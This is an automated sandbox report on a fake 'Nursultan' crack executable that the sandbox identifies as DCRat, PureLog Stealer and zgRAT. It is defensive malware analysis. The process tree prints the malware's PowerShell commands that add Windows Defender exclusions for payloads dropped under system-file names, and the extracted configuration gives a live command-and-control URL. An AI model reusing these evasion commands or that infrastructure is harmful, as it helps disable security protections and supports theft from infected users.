Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NursultanAlphaCrack.bat.exe

Overview

General Information

Sample name:NursultanAlphaCrack.bat.exe
Analysis ID:1590001
MD5:df15d1f8f7cc71bb1889895b367c7d2c
SHA1:4a9d087d105976a1f7a1c7444a25b5e0a8ac0622
SHA256:09bdb3282e1927dcb848126823280b066827c5dadd17ee6d445922440889d8f2
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NursultanAlphaCrack.bat.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe" MD5: DF15D1F8F7CC71BB1889895B367C7D2C)
    • wscript.exe (PID: 7792 cmdline: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7880 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BlockcontainerWin.exe (PID: 7932 cmdline: "C:\portsurrogateFontCrt/BlockcontainerWin.exe" MD5: B3F6318C958712D0C78B5A969EE2EFD1)
          • powershell.exe (PID: 2492 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1516 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2156 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 8052 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 1668 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7536 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7704 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2476 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7852 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 4600 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • smss.exe (PID: 7508 cmdline: "C:\Program Files\Windows NT\smss.exe" MD5: B3F6318C958712D0C78B5A969EE2EFD1)
              • cmd.exe (PID: 848 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chcp.com (PID: 4848 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • w32tm.exe (PID: 6292 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                • smss.exe (PID: 5888 cmdline: "C:\Program Files\Windows NT\smss.exe" MD5: B3F6318C958712D0C78B5A969EE2EFD1)
  • BlockcontainerWin.exe (PID: 5652 cmdline: C:\portsurrogateFontCrt\BlockcontainerWin.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)
  • BlockcontainerWin.exe (PID: 3376 cmdline: C:\portsurrogateFontCrt\BlockcontainerWin.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)
  • GKcQVcpwHdHgqKNzncXgLOYQsT.exe (PID: 2192 cmdline: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe MD5: B3F6318C958712D0C78B5A969EE2EFD1)
    • cmd.exe (PID: 2552 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 8024 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "http://237025cm.n9shteam.in/UpdatesqlCdn", "MUTEX": "DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
NursultanAlphaCrack.bat.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    NursultanAlphaCrack.bat.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Program Files\Windows NT\smss.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files\Windows NT\smss.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1360056049.00000000075E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.1358955428.0000000006CE9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000005.00000000.1428074698.0000000000FD2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: BlockcontainerWin.exe PID: 7932JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries
                          SourceRuleDescriptionAuthorStrings
                          0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.NursultanAlphaCrack.bat.exe.6d37705.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.NursultanAlphaCrack.bat.exe.6d37705.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.NursultanAlphaCrack.bat.exe.7634705.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 4 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ProcessId: 7932, TargetFilename: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portsurrogateFontCrt/BlockcontainerWin.exe", ParentImage: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ParentProcessId: 7932, ParentProcessName: BlockcontainerWin.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', ProcessId: 2492, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows NT\smss.exe" , CommandLine: "C:\Program Files\Windows NT\smss.exe" , CommandLine|base64offset|contains: , Image: C:\Program Files\Windows NT\smss.exe, NewProcessName: C:\Program Files\Windows NT\smss.exe, OriginalFileName: C:\Program Files\Windows NT\smss.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2476, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Windows NT\smss.exe" , ProcessId: 7508, ProcessName: smss.exe
                                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Windows NT\smss.exe, ProcessId: 7508, TargetFilename: C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portsurrogateFontCrt/BlockcontainerWin.exe", ParentImage: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ParentProcessId: 7932, ParentProcessName: BlockcontainerWin.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', ProcessId: 2492, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe", ParentImage: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe, ParentProcessId: 7712, ParentProcessName: NursultanAlphaCrack.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe" , ProcessId: 7792, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portsurrogateFontCrt/BlockcontainerWin.exe", ParentImage: C:\portsurrogateFontCrt\BlockcontainerWin.exe, ParentProcessId: 7932, ParentProcessName: BlockcontainerWin.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe', ProcessId: 2492, ProcessName: powershell.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-13T13:17:13.575913+010020480951A Network Trojan was detected192.168.2.949882104.21.80.180TCP
                                    2025-01-13T13:17:21.857172+010020480951A Network Trojan was detected192.168.2.952220104.21.80.180TCP
                                    2025-01-13T13:17:36.857189+010020480951A Network Trojan was detected192.168.2.952270104.21.48.180TCP
                                    2025-01-13T13:17:44.589748+010020480951A Network Trojan was detected192.168.2.952271104.21.48.180TCP
                                    2025-01-13T13:17:56.779104+010020480951A Network Trojan was detected192.168.2.952272104.21.48.180TCP
                                    2025-01-13T13:18:10.076013+010020480951A Network Trojan was detected192.168.2.952273104.21.48.180TCP
                                    2025-01-13T13:18:25.076021+010020480951A Network Trojan was detected192.168.2.952274104.21.48.180TCP
                                    2025-01-13T13:18:37.122916+010020480951A Network Trojan was detected192.168.2.952275104.21.48.180TCP
                                    2025-01-13T13:18:45.076063+010020480951A Network Trojan was detected192.168.2.952276104.21.48.180TCP
                                    2025-01-13T13:18:53.576114+010020480951A Network Trojan was detected192.168.2.952277104.21.48.180TCP
                                    2025-01-13T13:19:05.388613+010020480951A Network Trojan was detected192.168.2.952278104.21.48.180TCP
                                    2025-01-13T13:19:13.076114+010020480951A Network Trojan was detected192.168.2.952279104.21.48.180TCP
                                    2025-01-13T13:19:20.732460+010020480951A Network Trojan was detected192.168.2.952280104.21.48.180TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: NursultanAlphaCrack.bat.exeAvira: detected
                                    Source: http://237025cm.n9shteam.inAvira URL Cloud: Label: malware
                                    Source: http://237025cm.n9shteam.in/UpdatesqlCdn.phpAvira URL Cloud: Label: malware
                                    Source: http://237025cm.n9shteam.in/Avira URL Cloud: Label: malware
                                    Source: C:\Users\user\Desktop\EErUokRe.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Program Files\Windows NT\smss.exeAvira: detection malicious, Label: TR/Spy.Agent.dbxid
                                    Source: C:\Users\user\Desktop\BAOTDPUV.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeAvira: detection malicious, Label: TR/Spy.Agent.dbxid
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeAvira: detection malicious, Label: TR/Spy.Agent.dbxid
                                    Source: C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeAvira: detection malicious, Label: TR/Spy.Agent.dbxid
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeAvira: detection malicious, Label: TR/Spy.Agent.dbxid
                                    Source: C:\Users\user\Desktop\BOAdhoQl.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://237025cm.n9shteam.in/UpdatesqlCdn", "MUTEX": "DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeReversingLabs: Detection: 79%
                                    Source: C:\Program Files\Windows NT\smss.exeReversingLabs: Detection: 79%
                                    Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeReversingLabs: Detection: 79%
                                    Source: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exeReversingLabs: Detection: 79%
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeReversingLabs: Detection: 79%
                                    Source: C:\Users\user\Desktop\BAOTDPUV.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\BOAdhoQl.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\BwtLSSWj.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\DYilKdVO.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\EErUokRe.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\JDNtgNEK.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\OfbStevG.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\Rfxshdov.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\ZFTyARuY.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\ZTFIdpqp.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\kHvGrYKy.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\lhCxVqkE.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\medFrqzz.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\oCwXyDAs.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\ssnNFABl.logReversingLabs: Detection: 70%
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeReversingLabs: Detection: 79%
                                    Source: NursultanAlphaCrack.bat.exeVirustotal: Detection: 72%Perma Link
                                    Source: NursultanAlphaCrack.bat.exeReversingLabs: Detection: 63%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
                                    Source: C:\Users\user\Desktop\EErUokRe.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JRLLnIaC.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Windows NT\smss.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJoe Sandbox ML: detected
                                    Source: NursultanAlphaCrack.bat.exeJoe Sandbox ML: detected
                                    Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"}}
                                    Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-2yKTQ6LBTSFKcZS6SSCb","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]
                                    Source: 00000005.00000002.1537127203.0000000013585000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://237025cm.n9shteam.in/","UpdatesqlCdn"]]
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\9e8d7a4ca61bd9Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\WindowsPowerShell\0a62118e203df5Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows NT\smss.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows NT\69ddcba757bf72Jump to behavior
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NursultanAlphaCrack.bat.exe
                                    Source: Binary string: 5c561934e089\System.pdb source: smss.exe, 00000032.00000002.2216710248.000000001BED2000.00000004.00000020.00020000.00000000.sdmp
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001CA69B
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001DC220
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001EB348 FindFirstFileExA,0_2_001EB348
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile opened: C:\Users\user

                                    Software Vulnerabilities

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52220 -> 104.21.80.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52271 -> 104.21.48.1:80
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.9:52278 -> 104.21.48.1:80
